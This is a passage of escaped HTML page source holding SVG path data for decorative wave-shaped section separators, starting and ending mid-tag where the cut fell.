d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path 